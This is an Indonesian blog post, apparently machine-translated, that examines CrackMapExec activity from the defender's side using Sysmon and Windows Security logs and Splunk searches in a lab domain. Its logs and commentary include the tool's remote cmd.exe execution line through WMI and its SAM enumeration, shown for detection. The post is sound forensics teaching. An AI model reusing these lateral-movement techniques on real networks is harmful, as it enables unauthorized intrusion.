Belajar dengan berlatih: Bersenang-senang dengan CrackMapExec

  • Whatsapp
Belajar dengan berlatih: Bersenang-senang dengan CrackMapExec
Belajar dengan berlatih Bersenang senang dengan CrackMapExec

News.nextcloud.asia

Pada postingan sebelumnya, kita melihat crackmapexec dari sudut pandang penyerang. Dari sudut pandang defender, pertama-tama mari kita lihat log yang dihasilkan saat crackmapexec dijalankan di jaringan kita. Karena salah satu perangkat dikonfigurasi agar lognya diteruskan ke Splunk, kami dapat melihat informasi pelaporan host tentang pemindaian awal. Itu juga berarti, sementara beberapa perangkat berada di jaringan ini, tidak semua dikonfigurasi untuk meneruskan log mereka ke solusi logging terpusat. Ini biasanya berlaku untuk perangkat dalam jaringan produksi.

04/07/2019 11:08:41 PM
LogName=Microsoft-Windows-Sysmon/Operational
SourceName=Microsoft-Windows-Sysmon
EventCode=3
EventType=4
Type=Information
ComputerName=SECNIK-2K19.securitynik.local
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
TaskCategory=Network connection detected (rule: NetworkConnect)
OpCode=Info
RecordNumber=12826
Keywords=None
Message=Network connection detected:
RuleName: 
UtcTime: 2019-04-08 06:08:40.639
ProcessGuid: {48be9e4e-df2a-5caa-0000-0010eb030000}
ProcessId: 4
Image: System
User: NT AUTHORITYSYSTEM
Protocol: tcp
Initiated: false
SourceIsIpv6: false
SourceIp: 10.0.0.105
SourceHostname: SECNIK-2K19.securitynik.local
SourcePort: 445
SourcePortName: microsoft-ds
DestinationIsIpv6: false
DestinationIp: 10.0.0.100
DestinationHostname: 
DestinationPort: 34564
DestinationPortName:

Dari atas, kita melihat contoh pelaporan Sysmon bahwa koneksi jaringan terdeteksi dari host di “10.00.0.105” berkomunikasi pada port sumber “445” ke IP tujuan “10.0.0.100” pada port “34564”.

Seperti yang kita lihat di bawah, kita melihat contoh share yang sedang diakses:

04/08/2019 06:19:50 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5145
EventType=0
Type=Information
ComputerName=SECNIK-2K19.securitynik.local
TaskCategory=Detailed File Share
OpCode=Info
RecordNumber=43571
Keywords=Audit Success
Message=A network share object was checked to see whether client can be granted desired access. 

Subject:
 Security ID:  S-1-5-21-4078604576-3869073289-8028338-500
 Account Name:  Administrator
 Account Domain:  SECURITYNIK
 Logon ID:  0x5B3EF6

Network Information: 
 Object Type:  File
 Source Address:  10.0.0.100
 Source Port:  35710

Share Information:
 Share Name:  \*SYSVOL
 Share Path:  ??C:WindowsSYSVOLsysvol
 Relative Target Name: LusqPJemAo

Access Request Information:
 Access Mask:  0x110080
 Accesses:  DELETE
    SYNCHRONIZE
    ReadAttributes

Access Check Results:
 DELETE: Granted by D:(A;;FA;;;BA)
    SYNCHRONIZE: Granted by D:(A;;0x1200a9;;;WD)
    ReadAttributes: Granted by D:(A;;0x1200a9;;;WD)

Mari kita lihat lebih baik bagian-bagian ini diakses melalui gambar. Berikut adalah filter yang saya gunakan di Splunk untuk melihat data ini:

*  NOT "Files\SplunkUniversalForwarder"  NOT "0:0:0:0:0:0:0:1"  NOT "127.0.0.1"  NOT "fe80:0:0:0:89f9:808e:8310:538e" NOT "Resource Assignment" NOT "224.0.0.252" "10.0.0.100" 
|  stats count by Source_Address,Source_Port,ComputerName,Account_Name,Logon_ID,Security_ID,TaskCategory,Share_Name,Share_Path,Relative_Target_Name

Saat kita melihat enumerasi pengguna, kita melihat peristiwa pertama di mana firewall mengizinkan koneksi ke host pada 10.0.0.105

04/09/2019 06:08:41 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=SECNIK-2K19.securitynik.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=53458
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.

Application Information:
 Process ID:  4
 Application Name: System

Network Information:
 Direction:  Inbound
 Source Address:  10.0.0.100
 Source Port:  36662
 Destination Address: 10.0.0.105
 Destination Port:  445
 Protocol:  6

Filter Information:
 Filter Run-Time ID: 0
 Layer Name:  Receive/Accept
 Layer Run-Time ID: 44

Setelah izin firewall, kita dapat melihat “Administrator” telah berhasil masuk

04/09/2019 06:08:42 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=SECNIK-2K19.securitynik.local
TaskCategory=Logon
OpCode=Info
RecordNumber=53461
Keywords=Audit Success
Message=An account was successfully logged on.

Subject:
 Security ID:  S-1-0-0
 Account Name:  -
 Account Domain:  -
 Logon ID:  0x0

Logon Information:
 Logon Type:  3
 Restricted Admin Mode: -
 Virtual Account:  No
 Elevated Token:  Yes

Impersonation Level:  Impersonation

New Logon:
 Security ID:  S-1-5-21-4078604576-3869073289-8028338-500
 Account Name:  Administrator
 Account Domain:  SECURITYNIK
 Logon ID:  0xA8C3DC
 Linked Logon ID:  0x0
 Network Account Name: -
 Network Account Domain: -
 Logon GUID:  {00000000-0000-0000-0000-000000000000}

Process Information:
 Process ID:  0x0
 Process Name:  -

Network Information:
 Workstation Name: -
 Source Network Address: 10.0.0.100
 Source Port:  36662

Detailed Authentication Information:
 Logon Process:  NtLmSsp 
 Authentication Package: NTLM
 Transited Services: -
 Package Name (NTLM only): NTLM V2
 Key Length:  128

This event is generated when a logon session is created. It is generated on the computer that was accessed.

Selanjutnya kita melihat akun “Administrator” dengan alamat IP sumber 10.0.0.100 mengakses nama share “\*IPC$”

04/09/2019 06:08:42 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5140
EventType=0
Type=Information
ComputerName=SECNIK-2K19.securitynik.local
TaskCategory=File Share
OpCode=Info
RecordNumber=53462
Keywords=Audit Success
Message=A network share object was accessed.

Subject:
 Security ID:  S-1-5-21-4078604576-3869073289-8028338-500
 Account Name:  Administrator
 Account Domain:  SECURITYNIK
 Logon ID:  0xA8C3DC

Network Information: 
 Object Type:  File
 Source Address:  10.0.0.100
 Source Port:  36662

Share Information:
 Share Name:  \*IPC$
 Share Path:  

Access Request Information:
 Access Mask:  0x1
 Accesses:  ReadData (or ListDirectory)

Setelah share diakses, kami melihat di bawah bahwa izin sedang diperiksa pada share

04/09/2019 06:08:42 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5145
EventType=0
Type=Information
ComputerName=SECNIK-2K19.securitynik.local
TaskCategory=Detailed File Share
OpCode=Info
RecordNumber=53463
Keywords=Audit Success
Message=A network share object was checked to see whether client can be granted desired access.

Subject:
 Security ID:  S-1-5-21-4078604576-3869073289-8028338-500
 Account Name:  Administrator
 Account Domain:  SECURITYNIK
 Logon ID:  0xA8C3DC

Network Information: 
 Object Type:  File
 Source Address:  10.0.0.100
 Source Port:  36662

Share Information:
 Share Name:  \*IPC$
 Share Path:  
 Relative Target Name: samr

Access Request Information:
 Access Mask:  0x3
 Accesses:  ReadData (or ListDirectory)
    WriteData (or AddFile)

Access Check Results:
 -

Kami selanjutnya melihat pegangan yang diminta ke suatu objek. Perhatikan ini ditangani oleh proses “lsass.exe”. Dari bawah, kita dapat menyimpulkan bahwa akun pada sistem sedang terdaftar. Pegangan yang diminta dapat berupa objek Active Directory atau objek SAM. Karena perangkat ini menjalankan Windows 2019, kami menyimpulkan ini akan didasarkan pada Objek Direktori Aktif.

04/09/2019 06:08:42 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4661
EventType=0
Type=Information
ComputerName=SECNIK-2K19.securitynik.local
TaskCategory=SAM
OpCode=Info
RecordNumber=53464
Keywords=Audit Success
Message=A handle to an object was requested.

Subject :
 Security ID:  S-1-5-21-4078604576-3869073289-8028338-500
 Account Name:  Administrator
 Account Domain:  SECURITYNIK
 Logon ID:  0xA8C3DC

Object:
 Object Server: Security Account Manager
 Object Type: SAM_DOMAIN
 Object Name: DC=securitynik,DC=local
 Handle ID: 0x2555508d260

Process Information:
 Process ID: 0x22c
 Process Name: C:WindowsSystem32lsass.exe

Access Request Information:
 Transaction ID: {00000000-0000-0000-0000-000000000000}
 Accesses: DELETE
    READ_CONTROL
    WRITE_DAC
    WRITE_OWNER
    ReadPasswordParameters
    ReadOtherParameters
    WriteOtherParameters
    CreateUser
    CreateGlobalGroup
    CreateLocalGroup
    GetLocalGroupMembership
    ListAccounts

 Access Reasons:  -
 Access Mask: 0xF01FD
 Privileges Used for Access Check: -

 Properties: ---
 {19195a5a-6da0-11d0-afd3-00c04fd930c9}
 
DELETE
READ_CONTROL
WRITE_DAC
WRITE_OWNER
ReadPasswordParameters
ReadOtherParameters
WriteOtherParameters
CreateUser
CreateGlobalGroup
CreateLocalGroup
GetLocalGroupMembership

ListAccounts
  {c7407360-20bf-11d0-a768-00aa006e0529}
   {bf9679a4-0de6-11d0-a285-00aa003049e2}
   {bf9679a5-0de6-11d0-a285-00aa003049e2}
   {bf9679a6-0de6-11d0-a285-00aa003049e2}
   {bf9679bb-0de6-11d0-a285-00aa003049e2}
   {bf9679c2-0de6-11d0-a285-00aa003049e2}
   {bf9679c3-0de6-11d0-a285-00aa003049e2}
   {bf967a09-0de6-11d0-a285-00aa003049e2}
   {bf967a0b-0de6-11d0-a285-00aa003049e2}
  {b8119fd0-04f6-4762-ab7a-4986c76b3f9a}
   {bf967a34-0de6-11d0-a285-00aa003049e2}
   {bf967a33-0de6-11d0-a285-00aa003049e2}
   {bf9679c5-0de6-11d0-a285-00aa003049e2}
   {bf967a61-0de6-11d0-a285-00aa003049e2}
   {bf967977-0de6-11d0-a285-00aa003049e2}
   {bf96795e-0de6-11d0-a285-00aa003049e2}
   {bf9679ea-0de6-11d0-a285-00aa003049e2}
  {ab721a52-1e2f-11d0-9819-00aa0040529b}

 Restricted SID Count: 0

Demikian pula, kami melihat permintaan lain untuk pegangan ini. Namun, kali ini, perhatikan itu adalah daftar grup. Catatan serupa dengan di atas, informasi tambahan sedang diambil. Berbagai properti set GUID mewakili item yang berbeda.

04/09/2019 06:08:42 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4661
EventType=0
Type=Information
ComputerName=SECNIK-2K19.securitynik.local
TaskCategory=SAM
OpCode=Info
RecordNumber=53465
Keywords=Audit Success
Message=A handle to an object was requested.

Subject :
 Security ID:  S-1-5-21-4078604576-3869073289-8028338-500
 Account Name:  Administrator
 Account Domain:  SECURITYNIK
 Logon ID:  0xA8C3DC

Object:
 Object Server: Security Account Manager
 Object Type: SAM_USER
 Object Name: S-1-5-21-4078604576-3869073289-8028338-500
 Handle ID: 0x2555508e5a0

Process Information:
 Process ID: 0x22c
 Process Name: C:WindowsSystem32lsass.exe

Access Request Information:
 Transaction ID: {00000000-0000-0000-0000-000000000000}
 Accesses: DELETE
    READ_CONTROL
    WRITE_DAC
    WRITE_OWNER
    ReadGeneralInformation
    ReadPreferences
    WritePreferences
    ReadLogon
    ReadAccount
    WriteAccount
    SetPassword (without knowledge of old password)
    ListGroups

 Access Reasons:  -
 Access Mask: 0xF01BF
 Privileges Used for Access Check: -
 Properties: ---
 {bf967aba-0de6-11d0-a285-00aa003049e2}

DELETE
READ_CONTROL
WRITE_DAC
WRITE_OWNER
ReadGeneralInformation
ReadPreferences
WritePreferences
ReadLogon
ReadAccount
WriteAccount
SetPassword (without knowledge of old password)

ListGroups
  {59ba2f42-79a2-11d0-9020-00c04fc2d3cf}
   {bf967938-0de6-11d0-a285-00aa003049e2}
   {5fd42471-1262-11d0-a060-00aa006c33ed}
   {bf9679e8-0de6-11d0-a285-00aa003049e2}
   {bf967a00-0de6-11d0-a285-00aa003049e2}
   {3e0abfd0-126a-11d0-a060-00aa006c33ed}
   {bf967a6a-0de6-11d0-a285-00aa003049e2}
   {bf967953-0de6-11d0-a285-00aa003049e2}
  {4c164200-20c0-11d0-a768-00aa006e0529}
   {bf967915-0de6-11d0-a285-00aa003049e2}
   {bf967a0a-0de6-11d0-a285-00aa003049e2}
   {bf967a68-0de6-11d0-a285-00aa003049e2}
   {bf967a6d-0de6-11d0-a285-00aa003049e2}
  {5f202010-79a5-11d0-9020-00c04fc2d4cf}
   {bf96792e-0de6-11d0-a285-00aa003049e2}
   {bf967985-0de6-11d0-a285-00aa003049e2}
   {bf967986-0de6-11d0-a285-00aa003049e2}
   {bf967996-0de6-11d0-a285-00aa003049e2}
   {bf967997-0de6-11d0-a285-00aa003049e2}
   {bf9679aa-0de6-11d0-a285-00aa003049e2}
   {bf9679ab-0de6-11d0-a285-00aa003049e2}
   {bf9679ac-0de6-11d0-a285-00aa003049e2}
   {bf967a05-0de6-11d0-a285-00aa003049e2}
   {bf9679a8-0de6-11d0-a285-00aa003049e2}
  {e48d0154-bcf8-11d1-8702-00c04fb96050}
   {bf967950-0de6-11d0-a285-00aa003049e2}
  {bc0ac240-79a9-11d0-9020-00c04fc2d4cf}
   {bf967991-0de6-11d0-a285-00aa003049e2}
  {ab721a53-1e2f-11d0-9819-00aa0040529b}
  {00299570-246d-11d0-a768-00aa006e0529}
  {7ed84960-ad10-11d0-8a92-00aa006e0529}

 Restricted SID Count: 0

Sekarang mari kita lihat seperti apa log untuk melihat bagaimana kita mungkin dapat menemukan ketika permintaan dibuat untuk menghitung kebijakan kata sandi

04/17/2019 08:11:15 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4661
EventType=0
Type=Information
ComputerName=SECNIK-2K19.securitynik.local
TaskCategory=SAM
OpCode=Info
RecordNumber=150020
Keywords=Audit Success
Message=A handle to an object was requested.



Subject :
 Security ID:  S-1-5-21-4078604576-3869073289-8028338-500
 Account Name:  Administrator
 Account Domain:  SECURITYNIK
 Logon ID:  0x55E205

Object:
 Object Server: Security Account Manager
 Object Type: SAM_DOMAIN
 Object Name: DC=securitynik,DC=local
 Handle ID: 0x1fa0565e940

Process Information:
 Process ID: 0x234
 Process Name: C:WindowsSystem32lsass.exe

Access Request Information:
 Transaction ID: {00000000-0000-0000-0000-000000000000}
 Accesses: DELETE
    READ_CONTROL
    WRITE_DAC
    WRITE_OWNER
    ReadPasswordParameters
    ReadOtherParameters
    WriteOtherParameters
    CreateUser
    CreateGlobalGroup
    CreateLocalGroup
    GetLocalGroupMembership
    ListAccounts

   
 Access Reasons:  -
 Access Mask: 0xF01FD
 Privileges Used for Access Check: -
 Properties: ---
 {19195a5a-6da0-11d0-afd3-00c04fd930c9}

DELETE
READ_CONTROL
WRITE_DAC
WRITE_OWNER
ReadPasswordParameters
ReadOtherParameters
WriteOtherParameters
CreateUser
CreateGlobalGroup
CreateLocalGroup
GetLocalGroupMembership
ListAccounts
  {c7407360-20bf-11d0-a768-00aa006e0529}
   {bf9679a4-0de6-11d0-a285-00aa003049e2}
   {bf9679a5-0de6-11d0-a285-00aa003049e2}
   {bf9679a6-0de6-11d0-a285-00aa003049e2}
   {bf9679bb-0de6-11d0-a285-00aa003049e2}
   {bf9679c2-0de6-11d0-a285-00aa003049e2}
   {bf9679c3-0de6-11d0-a285-00aa003049e2}
   {bf967a09-0de6-11d0-a285-00aa003049e2}
   {bf967a0b-0de6-11d0-a285-00aa003049e2}
  {b8119fd0-04f6-4762-ab7a-4986c76b3f9a}
   {bf967a34-0de6-11d0-a285-00aa003049e2}
   {bf967a33-0de6-11d0-a285-00aa003049e2}
   {bf9679c5-0de6-11d0-a285-00aa003049e2}
   {bf967a61-0de6-11d0-a285-00aa003049e2}
   {bf967977-0de6-11d0-a285-00aa003049e2}
   {bf96795e-0de6-11d0-a285-00aa003049e2}
   {bf9679ea-0de6-11d0-a285-00aa003049e2}
  {ab721a52-1e2f-11d0-9819-00aa0040529b}

 Restricted SID Count: 0

Di atas mencerminkan kebijakan kata sandi yang diminta (bersama dengan parameter domain lainnya). Lihat bagian referensi untuk tautan mereka untuk menerjemahkan nilai.

Sekarang mari kita lihat seperti apa komunikasi saat crackmapexec menjalankan perintah powershell.

Untuk membantu kita memahami koneksi yang dibuat, mari kita lihat beberapa statistik melalui Splunk. Secara khusus, bersama dengan beberapa informasi penting, mari kita identifikasi sesi masuk yang berbeda. Kami dapat melacak ini melalui bidang “Logon_ID” seperti yang ditunjukkan di bawah ini.

* NOT("splunk" OR "activedirectory.webservices.exe" OR "::1" OR "127.0.0.1" OR Protocol=17) 
|  stats count by Source_Address,Source_Port,Logon_ID,Account_Name,Share_Name

Source_Address   Source_Port Logon_ID Account_Name Share_Name count
10.0.0.100   53494  0xB48A3E Administrator \*C$  21
10.0.0.100   53496  0xB48A64 Administrator \*IPC$ 2
fe80::89f9:808e:8310:538e 56096  0xB4D870 SECNIK-2K19$ \*SYSVOL 2
fe80::89f9:808e:8310:538e 56100  0xB5543B SECNIK-2K19$ \*SYSVOL 3
fe80::89f9:808e:8310:538e 56103  0x3E4  SECNIK-2K19$ \*IPC$ 1

Dari informasi di atas, sepertinya sesi pertama adalah sesi tersibuk. Mari kita lihat sesi itu untuk melihat apa yang bisa kita temukan.

Menggunakan filter yang berfokus pada Logon_ID “0xB48A3E”, kita melihat yang berikut:

04/18/2019 01:32:43 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=SECNIK-2K19.securitynik.local
TaskCategory=Logon
OpCode=Info
RecordNumber=172526
Keywords=Audit Success
Message=An account was successfully logged on.


Subject:
 Security ID:  S-1-0-0
 Account Name:  -
 Account Domain:  -
 Logon ID:  0x0

Logon Information:
 Logon Type:  3
 Restricted Admin Mode: -
 Virtual Account:  No
 Elevated Token:  Yes

Impersonation Level:  Impersonation

New Logon:
 Security ID:  S-1-5-21-4078604576-3869073289-8028338-500
 Account Name:  Administrator
 Account Domain:  SECURITYNIK
 Logon ID:  0xB48A3E
 Linked Logon ID:  0x0
 Network Account Name: -
 Network Account Domain: -
 Logon GUID:  {00000000-0000-0000-0000-000000000000}

Process Information:
 Process ID:  0x0
 Process Name:  -

Network Information:
 Workstation Name: -
 Source Network Address: 10.0.0.100
 Source Port:  53494

Detailed Authentication Information:
 Logon Process:  NtLmSsp 
 Authentication Package: NTLM
 Transited Services: -
 Package Name (NTLM only): NTLM V2
 Key Length:  128

Di atas kita melihat pengguna “Administrator” berhasil masuk dari “10.0.0.100:53494” dan diberi ID masuk “0xB48A3E”.

Kami kemudian melihat di bawah bahwa nama berbagi “\*C$” diakses melalui tindakan baca (atau daftar direktori).

04/18/2019 01:32:44 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5140
EventType=0
Type=Information
ComputerName=SECNIK-2K19.securitynik.local
TaskCategory=File Share
OpCode=Info
RecordNumber=172553
Keywords=Audit Success
Message=A network share object was accessed.

Subject:
 Security ID:  S-1-5-21-4078604576-3869073289-8028338-500
 Account Name:  Administrator
 Account Domain:  SECURITYNIK
 Logon ID:  0xB48A3E

Network Information: 
 Object Type:  File
 Source Address:  10.0.0.100
 Source Port:  53494

Share Information:
 Share Name:  \*C$
 Share Path:  ??C:

Access Request Information:
 Access Mask:  0x1
 Accesses:  ReadData (or ListDirectory)

Selanjutnya kita lihat di bawah objek “WindowsTempkJpSGP” diperiksa untuk melihat apakah akses ReadData dapat diberikan ke target “WindowsTempkJpSGP”

04/18/2019 01:32:44 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5145
EventType=0
Type=Information
ComputerName=SECNIK-2K19.securitynik.local
TaskCategory=Detailed File Share
OpCode=Info
RecordNumber=172554
Keywords=Audit Success
Message=A network share object was checked to see whether client can be granted desired access.

Subject:
 Security ID:  S-1-5-21-4078604576-3869073289-8028338-500
 Account Name:  Administrator
 Account Domain:  SECURITYNIK
 Logon ID:  0xB48A3E

Network Information: 
 Object Type:  File
 Source Address:  10.0.0.100
 Source Port:  53494

Share Information:
 Share Name:  \*C$
 Share Path:  ??C:
 Relative Target Name: WindowsTempkJpSGP

Access Request Information:
 Access Mask:  0x1
 Accesses:  ReadData (or ListDirectory)
    
Access Check Results:

Selanjutnya di bawah, kita melihat upaya lain untuk memeriksa apakah akses dapat diberikan. Kali ini ke “WindowsTempkJpSGP”

04/18/2019 01:32:45 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5145
EventType=0
Type=Information
ComputerName=SECNIK-2K19.securitynik.local
TaskCategory=Detailed File Share
OpCode=Info
RecordNumber=172568
Keywords=Audit Success
Message=A network share object was checked to see whether client can be granted desired access.

Subject:
 Security ID:  S-1-5-21-4078604576-3869073289-8028338-500
 Account Name:  Administrator
 Account Domain:  SECURITYNIK
 Logon ID:  0xB48A3E

Network Information: 
 Object Type:  File
 Source Address:  10.0.0.100
 Source Port:  53494

Share Information:
 Share Name:  \*C$
 Share Path:  ??C:
 Relative Target Name: WindowsTempkJpSGP

Access Request Information:
 Access Mask:  0x1
 Accesses:  ReadData (or ListDirectory)
    
Access Check Results:

Mengikuti acara di atas, kita melihat di bawah bahwa pemeriksaan telah dilakukan untuk melihat apakah ada izin yang diperlukan untuk menghapus file di atas.

04/18/2019 01:32:45 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5145
EventType=0
Type=Information
ComputerName=SECNIK-2K19.securitynik.local
TaskCategory=Detailed File Share
OpCode=Info
RecordNumber=172570
Keywords=Audit Success
Message=A network share object was checked to see whether client can be granted desired access.

Subject:
 Security ID:  S-1-5-21-4078604576-3869073289-8028338-500
 Account Name:  Administrator
 Account Domain:  SECURITYNIK
 Logon ID:  0xB48A3E

Network Information: 
 Object Type:  File
 Source Address:  10.0.0.100
 Source Port:  53494

Share Information:
 Share Name:  \*C$
 Share Path:  ??C:
 Relative Target Name: WindowsTempkJpSGP

Access Request Information:
 Access Mask:  0x10080
 Accesses:  DELETE
    ReadAttributes

Access Check Results:

Mirip dengan di atas, ada sejumlah pemeriksaan ini untuk melihat apakah izin yang diperlukan sudah ada. Namun, demi kepentingan ruang dan waktu, saya memilih untuk tidak memasukkan mereka ke dalam analisis ini.

Akhirnya, akun ini keluar seperti yang ditunjukkan di bawah ini.

04/18/2019 01:32:47 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=SECNIK-2K19.securitynik.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=172610
Keywords=Audit Success
Message=An account was logged off.

Subject:
 Security ID:  S-1-5-21-4078604576-3869073289-8028338-500
 Account Name:  Administrator
 Account Domain:  SECURITYNIK
 Logon ID:  0xB48A3E

Logon Type:   3

Sekarang mari kita lihat apa yang terjadi dengan ID masuk “0xB48A64” yang dikaitkan dengan IP 10.0.0.100.

04/18/2019 01:32:43 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=SECNIK-2K19.securitynik.local
TaskCategory=Logon
OpCode=Info
RecordNumber=172530
Keywords=Audit Success
Message=An account was successfully logged on.


Subject:
 Security ID:  S-1-0-0
 Account Name:  -
 Account Domain:  -
 Logon ID:  0x0

Logon Information:
 Logon Type:  3
 Restricted Admin Mode: -
 Virtual Account:  No
 Elevated Token:  Yes

Impersonation Level:  Impersonation

New Logon:
 Security ID:  S-1-5-21-4078604576-3869073289-8028338-500
 Account Name:  Administrator
 Account Domain:  SECURITYNIK
 Logon ID:  0xB48A64
 Linked Logon ID:  0x0
 Network Account Name: -
 Network Account Domain: -
 Logon GUID:  {00000000-0000-0000-0000-000000000000}

Process Information:
 Process ID:  0x0
 Process Name:  -

Network Information:
 Workstation Name: -
 Source Network Address: 10.0.0.100
 Source Port:  53496

Detailed Authentication Information:
 Logon Process:  NtLmSsp 
 Authentication Package: NTLM
 Transited Services: -
 Package Name (NTLM only): NTLM V2
 Key Length:  128

Di atas kita melihat logon yang pada akhirnya diikuti oleh logon seperti gambar di bawah ini.

04/18/2019 01:32:47 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=SECNIK-2K19.securitynik.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=172609
Keywords=Audit Success
Message=An account was logged off.

Subject:
 Security ID:  S-1-5-21-4078604576-3869073289-8028338-500
 Account Name:  Administrator
 Account Domain:  SECURITYNIK
 Logon ID:  0xB48A64

Logon Type:   3

Pada titik ini kesimpulan saya adalah bahwa kami melewatkan sesuatu dalam analisis kami. Ini pasti karena filter awal kami. Meskipun filter itu membantu kami mendeteksi beberapa aktivitas, itu tidak membantu kami menemukan di mana perintah powershell yang sebenarnya dieksekusi. Mari kita mundur sejenak dan melihat antara waktu masuk dan keluar di atas untuk melihat apakah kita bisa mendapatkan wawasan yang lebih baik tentang apa yang mungkin terjadi selama waktu itu.

Saat saya menelusuri log, saya melihat ID masuk yang tidak tertangkap oleh filter saya sebelumnya. ID Masuk baru ini adalah “0xB48AC1”. Anda mungkin juga memperhatikan bahwa port “10.0.0.100:37794” tidak ada dalam filter kami di atas. Mungkin kita melewatkan sesuatu. Semoga kelalaian saya di atas membantu Anda memahami betapa mudahnya kehilangan bukti penting.

Di bawah ini kita melihat bahwa akun berhasil masuk

04/18/2019 01:32:44 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=SECNIK-2K19.securitynik.local
TaskCategory=Logon
OpCode=Info
RecordNumber=172543
Keywords=Audit Success
Message=An account was successfully logged on.

Subject:
 Security ID:  S-1-0-0
 Account Name:  -
 Account Domain:  -
 Logon ID:  0x0

Logon Information:
 Logon Type:  3
 Restricted Admin Mode: -
 Virtual Account:  No
 Elevated Token:  Yes

Impersonation Level:  Impersonation

New Logon:
 Security ID:  S-1-5-21-4078604576-3869073289-8028338-500
 Account Name:  Administrator
 Account Domain:  SECURITYNIK
 Logon ID:  0xB48AC1
 Linked Logon ID:  0x0
 Network Account Name: -
 Network Account Domain: -
 Logon GUID:  {00000000-0000-0000-0000-000000000000}

Process Information:
 Process ID:  0x0
 Process Name:  -

Network Information:
 Workstation Name: -
 Source Network Address: 10.0.0.100
 Source Port:  37794

Detailed Authentication Information:
 Logon Process:  NtLmSsp 
 Authentication Package: NTLM
 Transited Services: -
 Package Name (NTLM only): NTLM V2
 Key Length:  128

Sekarang kita memiliki ID Masuk baru “0xB48AC1”, kita dapat mengatur filter untuk fokus pada aktivitas yang dilakukan oleh ID Masuk ini. Mari kita maju untuk melihat apa yang bisa kita temukan relevansinya.

Segera setelah masuk, kita melihat di bawah akun “Administrator” menggunakan ID Masuk “0xB48AC1” membuat proses baru untuk “cmd.exe”. Saat kita melihat “Process Command Line” di bawah ini, kita melihat dengan menarik bahwa file “WindowsTempkJpSGP” yang kami rujuk di atas dan yang sedang dilakukan pemeriksaan izin sedang digunakan. Saya menemukan baris perintah ini menarik, jadi mari kita uraikan.

Pada dasarnya di bawah ini, argumen untuk “cmd.exe” adalah sebagai berikut:
/Q – Mematikan gema
/c – Menjalankan perintah yang ditentukan oleh string dan kemudian berakhir
cd – mengatakan untuk beralih ke direktori root dalam hal ini C: kemungkinan besar
1> – ambil apa pun dari output dari perintah sebelumnya dan kirimkan ke ….
… \127.0.0.1C$WindowsTempkJpSGP – File tempat konten pengalihan harus dikirim jika ada
2>&1 – Ambil kesalahan yang mungkin terjadi dan kirimkan ke tempat standar keluar yaitu ke file “kJpSGP”

Sekarang kita tahu tentang apa perintah itu, mari kita lanjutkan.

04/18/2019 01:32:44 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=SECNIK-2K19.securitynik.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=172550
Keywords=Audit Success
Message=A new process has been created.

Creator Subject:
 Security ID:  S-1-5-20
 Account Name:  SECNIK-2K19$
 Account Domain:  SECURITYNIK
 Logon ID:  0x3E4

Target Subject:
 Security ID:  S-1-0-0
 Account Name:  Administrator
 Account Domain:  SECURITYNIK
 Logon ID:  0xB48AC1

Process Information:
 New Process ID:  0xe00
 New Process Name: C:WindowsSystem32cmd.exe
 Token Elevation Type: %%1936
 Mandatory Label:  S-1-16-12288
 Creator Process ID: 0x12cc
 Creator Process Name: C:WindowsSystem32wbemWmiPrvSE.exe
 Process Command Line: cmd.exe /Q /c cd  1> \127.0.0.1C$WindowsTempkJpSGP 2>&1

Kami kemudian melihat proses “cmd.exe” di atas, sekarang membuat di bawah proses “conhost.exe”.

04/18/2019 01:32:44 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=SECNIK-2K19.securitynik.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=172551
Keywords=Audit Success
Message=A new process has been created.

Creator Subject:
 Security ID:  S-1-5-21-4078604576-3869073289-8028338-500
 Account Name:  Administrator
 Account Domain:  SECURITYNIK
 Logon ID:  0xB48AC1

Target Subject:
 Security ID:  S-1-0-0
 Account Name:  -
 Account Domain:  -
 Logon ID:  0x0

Process Information:
 New Process ID:  0x1040
 New Process Name: C:WindowsSystem32conhost.exe
 Token Elevation Type: %%1936
 Mandatory Label:  S-1-16-12288
 Creator Process ID: 0xe00
 Creator Process Name: C:WindowsSystem32cmd.exe
 Process Command Line: ??C:Windowssystem32conhost.exe 0xffffffff -ForceV1

Selanjutnya kita lihat di bawah pada localhost (127.0.0.1), beberapa aktivitas yang dilakukan oleh ID masuk “0xB48AC1”. Secara khusus kami melihat upaya untuk memeriksa untuk melihat apakah ada izin yang cukup atau tidak untuk “Hak untuk membaca informasi dalam deskripsi keamanan objek”, “Hak untuk menggunakan objek untuk sinkronisasi”, “hak untuk menulis data ke file “, “Hak untuk menambahkan data ke file”, “Hak untuk menulis atribut file yang diperluas”, “Hak untuk membaca atribut file” dan terakhir “Hak untuk menulis atribut file.”

04/18/2019 01:32:45 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5145
EventType=0
Type=Information
ComputerName=SECNIK-2K19.securitynik.local
TaskCategory=Detailed File Share
OpCode=Info
RecordNumber=172566
